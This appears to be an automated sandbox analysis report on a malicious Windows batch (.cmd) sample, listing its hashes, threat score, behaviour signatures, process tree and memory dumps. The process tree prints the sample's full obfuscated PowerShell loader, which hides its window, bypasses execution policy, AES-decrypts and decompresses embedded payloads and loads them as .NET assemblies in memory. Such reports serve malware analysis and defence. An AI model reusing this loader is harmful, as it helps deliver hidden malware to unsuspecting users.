Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
24-05-2024 12:59
Static task
static1
Behavioral task
behavioral1
Sample
152cbca849779c40fe6673458a9e25e4be0b080f7cb4db8cfee5a88cec74b1e5.cmd
Resource
win7-20231129-en
windows7-x64
4 signatures
150 seconds
General
-
Target
152cbca849779c40fe6673458a9e25e4be0b080f7cb4db8cfee5a88cec74b1e5.cmd
-
Size
65KB
-
MD5
85c9311ae0014ac8bb98089d0bd51bdc
-
SHA1
5140e9beda6014b02df3c09f84a284f9c25532ca
-
SHA256
152cbca849779c40fe6673458a9e25e4be0b080f7cb4db8cfee5a88cec74b1e5
-
SHA512
f202a1e07afb444e5264cd28f7c0eedd55a3d002d14f989bf9fb065fd451be1df6197b5dcb61c616e8dbd1d3ba43cdc058192c89858c8bc292c199d5e8e9fb54
-
SSDEEP
768:std2pH1E6G5dMQzfwXLyVM0rAQiB/tp6UTGKxHHVpMGgJxhvtsQekLpzmWnfCB3Q:fpH1E6YrfDSF+UaaLtE1sQeAJ2Zlg9
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1820 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1820 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 2200 wrote to memory of 804 2200 cmd.exe cmd.exe PID 2200 wrote to memory of 804 2200 cmd.exe cmd.exe PID 2200 wrote to memory of 804 2200 cmd.exe cmd.exe PID 2200 wrote to memory of 1964 2200 cmd.exe cmd.exe PID 2200 wrote to memory of 1964 2200 cmd.exe cmd.exe PID 2200 wrote to memory of 1964 2200 cmd.exe cmd.exe PID 1964 wrote to memory of 3016 1964 cmd.exe cmd.exe PID 1964 wrote to memory of 3016 1964 cmd.exe cmd.exe PID 1964 wrote to memory of 3016 1964 cmd.exe cmd.exe PID 1964 wrote to memory of 2416 1964 cmd.exe cmd.exe PID 1964 wrote to memory of 2416 1964 cmd.exe cmd.exe PID 1964 wrote to memory of 2416 1964 cmd.exe cmd.exe PID 1964 wrote to memory of 1820 1964 cmd.exe powershell.exe PID 1964 wrote to memory of 1820 1964 cmd.exe powershell.exe PID 1964 wrote to memory of 1820 1964 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\152cbca849779c40fe6673458a9e25e4be0b080f7cb4db8cfee5a88cec74b1e5.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\2⤵PID:804
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\152cbca849779c40fe6673458a9e25e4be0b080f7cb4db8cfee5a88cec74b1e5.cmd2⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\3⤵PID:3016
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\152cbca849779c40fe6673458a9e25e4be0b080f7cb4db8cfee5a88cec74b1e5.cmd';$CMIY='ReazBIWdzBIWLzBIWinzBIWeszBIW'.Replace('zBIW', ''),'LXpsBoadXpsB'.Replace('XpsB', ''),'CXFxWopXFxWyTXFxWoXFxW'.Replace('XFxW', ''),'ChSZNiaSZNinSZNigSZNieExSZNiteSZNinSZNisiSZNionSZNi'.Replace('SZNi', ''),'DecehEzompehEzrehEzeehEzssehEz'.Replace('ehEz', ''),'EleFRIUmenFRIUtFRIUAFRIUtFRIU'.Replace('FRIU', ''),'InwXPBvowXPBkwXPBewXPB'.Replace('wXPB', ''),'GeAzGItCAzGIurAzGIrenAzGItAzGIPAzGIrocAzGIessAzGI'.Replace('AzGI', ''),'SWavzpWavzliWavztWavz'.Replace('Wavz', ''),'TrQRjDaQRjDnsQRjDfQRjDorQRjDmFiQRjDnQRjDaQRjDlQRjDBQRjDlQRjDoQRjDckQRjD'.Replace('QRjD', ''),'EQBEyntQBEyrQBEyyPQBEyoiQBEyntQBEy'.Replace('QBEy', ''),'CfrRUrefrRUatfrRUeDfrRUecrfrRUyptfrRUorfrRU'.Replace('frRU', ''),'FrostbEmBastbEse6stbE4SstbEtrstbEinstbEgstbE'.Replace('stbE', ''),'MlFlLailFlLnMlFlLolFlLdlFlLullFlLelFlL'.Replace('lFlL', '');powershell -w hidden;function iadMU($QWytb){$xHhyf=[System.Security.Cryptography.Aes]::Create();$xHhyf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$xHhyf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$xHhyf.Key=[System.Convert]::($CMIY[12])('tgQIjCkwwZqAzylw/Tfv+EER7SzcL8PBsCAaLmr+5qk=');$xHhyf.IV=[System.Convert]::($CMIY[12])('pSyOatGwmEbEIOKwBSvE0g==');$DSRRZ=$xHhyf.($CMIY[11])();$Quqau=$DSRRZ.($CMIY[9])($QWytb,0,$QWytb.Length);$DSRRZ.Dispose();$xHhyf.Dispose();$Quqau;}function XBiYS($QWytb){$uSNme=New-Object System.IO.MemoryStream(,$QWytb);$CliDx=New-Object System.IO.MemoryStream;$gFTqG=New-Object System.IO.Compression.GZipStream($uSNme,[IO.Compression.CompressionMode]::($CMIY[4]));$gFTqG.($CMIY[2])($CliDx);$gFTqG.Dispose();$uSNme.Dispose();$CliDx.Dispose();$CliDx.ToArray();}$uMaFe=[System.IO.File]::($CMIY[0])([Console]::Title);$zflDv=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 5).Substring(2))));$dcHsS=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 6).Substring(2))));[System.Reflection.Assembly]::($CMIY[1])([byte[]]$dcHsS).($CMIY[10]).($CMIY[6])($null,$null);[System.Reflection.Assembly]::($CMIY[1])([byte[]]$zflDv).($CMIY[10]).($CMIY[6])($null,$null); "3⤵PID:2416
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1820
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1820-4-0x000007FEF5F9E000-0x000007FEF5F9F000-memory.dmpFilesize
4KB
-
memory/1820-5-0x000000001B670000-0x000000001B952000-memory.dmpFilesize
2.9MB
-
memory/1820-6-0x0000000002240000-0x0000000002248000-memory.dmpFilesize
32KB
-
memory/1820-7-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmpFilesize
9.6MB
-
memory/1820-8-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmpFilesize
9.6MB
-
memory/1820-9-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmpFilesize
9.6MB
-
memory/1820-10-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmpFilesize
9.6MB